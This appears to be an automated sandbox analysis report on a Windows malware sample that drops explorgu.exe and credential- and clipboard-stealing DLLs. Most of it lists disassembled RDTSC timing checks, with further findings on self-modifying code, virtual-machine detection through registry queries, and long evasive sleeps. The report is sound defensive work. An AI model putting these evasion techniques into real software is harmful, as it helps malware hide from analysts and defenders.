Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E5095C second address: 4E50A3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FED75508877h 0x00000009 xor ecx, 13C54A4Eh 0x0000000f jmp 00007FED75508879h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FED75508870h 0x0000001b and ax, B6C8h 0x00000020 jmp 00007FED7550886Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 mov esi, dword ptr [ebp+08h] 0x0000002c pushad 0x0000002d jmp 00007FED75508874h 0x00000032 push esi 0x00000033 movsx edx, ax 0x00000036 pop esi 0x00000037 popad 0x00000038 mov ebx, 00000000h 0x0000003d pushad 0x0000003e jmp 00007FED75508874h 0x00000043 popad 0x00000044 test esi, esi 0x00000046 jmp 00007FED7550886Ch 0x0000004b je 00007FEDE75DE1F1h 0x00000051 jmp 00007FED75508870h 0x00000056 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000005d pushad 0x0000005e pushad 0x0000005f mov bx, cx 0x00000062 mov esi, 14DB41DFh 0x00000067 popad 0x00000068 mov edi, eax 0x0000006a popad 0x0000006b mov ecx, esi 0x0000006d push eax 0x0000006e push edx 0x0000006f jmp 00007FED7550886Dh 0x00000074 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50A3F second address: 4E50A75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FEDE7013E65h 0x0000000f jmp 00007FED74F3E51Eh 0x00000014 test byte ptr [76FB6968h], 00000002h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov bl, 9Eh 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50A75 second address: 4E50A7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50A7B second address: 4E50A7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50A7F second address: 4E50AF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FEDE75DE18Ah 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 pop ebx 0x00000015 jmp 00007FED75508876h 0x0000001a popad 0x0000001b call 00007FED75508872h 0x00000020 call 00007FED75508872h 0x00000025 pop eax 0x00000026 pop ebx 0x00000027 popad 0x00000028 mov edx, dword ptr [ebp+0Ch] 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FED75508878h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50AF9 second address: 4E50B08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E51Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50B08 second address: 4E50B0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50B0E second address: 4E50B12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50B12 second address: 4E50B16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50B16 second address: 4E50B25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50B25 second address: 4E50B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50B29 second address: 4E50B42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E525h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50B42 second address: 4E50BA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FED75508873h 0x00000009 add cl, 0000007Eh 0x0000000c jmp 00007FED75508879h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov dword ptr [esp], ebx 0x00000018 jmp 00007FED7550886Eh 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FED75508877h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50BA4 second address: 4E50C1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FED74F3E51Fh 0x00000009 and cx, 12EEh 0x0000000e jmp 00007FED74F3E529h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FED74F3E520h 0x0000001a add al, 00000068h 0x0000001d jmp 00007FED74F3E51Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 push eax 0x00000027 jmp 00007FED74F3E529h 0x0000002c xchg eax, ebx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov esi, ebx 0x00000032 movsx edi, ax 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50C1D second address: 4E50C77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+14h] 0x0000000c pushad 0x0000000d jmp 00007FED7550886Ch 0x00000012 mov cx, DFB1h 0x00000016 popad 0x00000017 push dword ptr [ebp+10h] 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushfd 0x0000001e jmp 00007FED75508878h 0x00000023 sub si, ECB8h 0x00000028 jmp 00007FED7550886Bh 0x0000002d popfd 0x0000002e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50CDD second address: 4E50CF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50CF2 second address: 4E50D25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 call 00007FED75508873h 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FED75508871h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50D25 second address: 4E50D2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50D2B second address: 4E50D31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50D31 second address: 4E50D68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E526h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esp, ebp 0x0000000d jmp 00007FED74F3E520h 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov eax, edi 0x00000018 mov dh, 5Eh 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50D68 second address: 4E50D6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50D6E second address: 4E50D72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60D37 second address: 4E60D9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 4A554E1Ah 0x00000008 pushfd 0x00000009 jmp 00007FED7550886Bh 0x0000000e adc si, 97BEh 0x00000013 jmp 00007FED75508879h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e movzx esi, bx 0x00000021 call 00007FED75508879h 0x00000026 movzx esi, di 0x00000029 pop ebx 0x0000002a popad 0x0000002b push eax 0x0000002c pushad 0x0000002d mov esi, edi 0x0000002f movsx edi, si 0x00000032 popad 0x00000033 xchg eax, ebp 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60D9F second address: 4E60DB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E525h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60DB8 second address: 4E60E00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FED7550886Eh 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov bx, 81F0h 0x00000018 call 00007FED75508879h 0x0000001d pop eax 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60AB2 second address: 4E60AC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E51Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60AC5 second address: 4E60ACB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60ACB second address: 4E60ACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60ACF second address: 4E60AED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007FED7550886Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E60AED second address: 4E60AF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EE06F0 second address: 4EE0764 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508874h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FED75508870h 0x0000000f push eax 0x00000010 jmp 00007FED7550886Bh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007FED75508876h 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e jmp 00007FED7550886Eh 0x00000023 mov ah, 3Bh 0x00000025 popad 0x00000026 pop ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FED7550886Fh 0x00000030 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EE0764 second address: 4EE0768 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EE0768 second address: 4EE076E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED0863 second address: 4ED0869 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED0869 second address: 4ED088F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 call 00007FED75508876h 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED088F second address: 4ED0893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED0893 second address: 4ED0897 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED0897 second address: 4ED089D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED089D second address: 4ED08CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508872h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FED75508877h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED08CF second address: 4ED08E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED74F3E524h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED08E7 second address: 4ED08F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED08F7 second address: 4ED08FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED08FB second address: 4ED0901 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED0901 second address: 4ED0906 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED0906 second address: 4ED0921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 5002h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FED7550886Bh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED0921 second address: 4ED0925 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED0925 second address: 4ED092B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED092B second address: 4ED093A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED74F3E51Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED07CE second address: 4ED07F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ax, bx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED07F4 second address: 4ED07F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED07F8 second address: 4ED07FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED07FC second address: 4ED0836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 jmp 00007FED74F3E51Bh 0x0000000d mov ebp, esp 0x0000000f jmp 00007FED74F3E526h 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FED74F3E51Ah 0x0000001e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED0836 second address: 4ED083A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED083A second address: 4ED0840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E700F6 second address: 4E700FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E700FA second address: 4E70100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E70100 second address: 4E70106 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E70106 second address: 4E7015C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FED74F3E51Fh 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov dx, cx 0x00000013 push ecx 0x00000014 mov bx, F952h 0x00000018 pop edi 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c jmp 00007FED74F3E526h 0x00000021 pop ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FED74F3E527h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E7015C second address: 4E70163 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED0BB0 second address: 4ED0BF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E523h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FED74F3E526h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FED74F3E527h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED0BF9 second address: 4ED0C72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c jmp 00007FED7550886Eh 0x00000011 push dword ptr [ebp+08h] 0x00000014 jmp 00007FED75508870h 0x00000019 push F3EDA717h 0x0000001e jmp 00007FED75508871h 0x00000023 add dword ptr [esp], 0C1358EBh 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d call 00007FED75508873h 0x00000032 pop ecx 0x00000033 movsx edx, cx 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED0C72 second address: 4ED0C78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED0C78 second address: 4ED0C7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED0C9B second address: 4ED0C9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED0C9F second address: 4ED0CA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED0CA5 second address: 4ED0CB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov al, A2h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a movzx eax, al 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED0CB8 second address: 4ED0CBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED0CBE second address: 4ED0CDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED74F3E528h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4ED0CDA second address: 4ED0CDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\wIaKimJFke.exe	Special instruction interceptor: First address: 54BB5F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Special instruction interceptor: First address: 54BA89 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Special instruction interceptor: First address: 6F2A0A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Special instruction interceptor: First address: 6F983A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Special instruction interceptor: First address: 77998A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Special instruction interceptor: First address: 30BB5F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Special instruction interceptor: First address: 30BA89 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Special instruction interceptor: First address: 4B2A0A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Special instruction interceptor: First address: 4B983A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Special instruction interceptor: First address: 53998A instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\wIaKimJFke.exe

Code function: 0_2_04ED0C6D rdtsc

0_2_04ED0C6D

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Thread delayed: delay time: 180000			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window / User API: threadDelayed 1123	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window / User API: threadDelayed 1032	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window / User API: threadDelayed 1032	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Window / User API: threadDelayed 1008	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 9994	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4653	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5194	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7936	Thread sleep time: -44022s >= -30000s	Jump to behavior
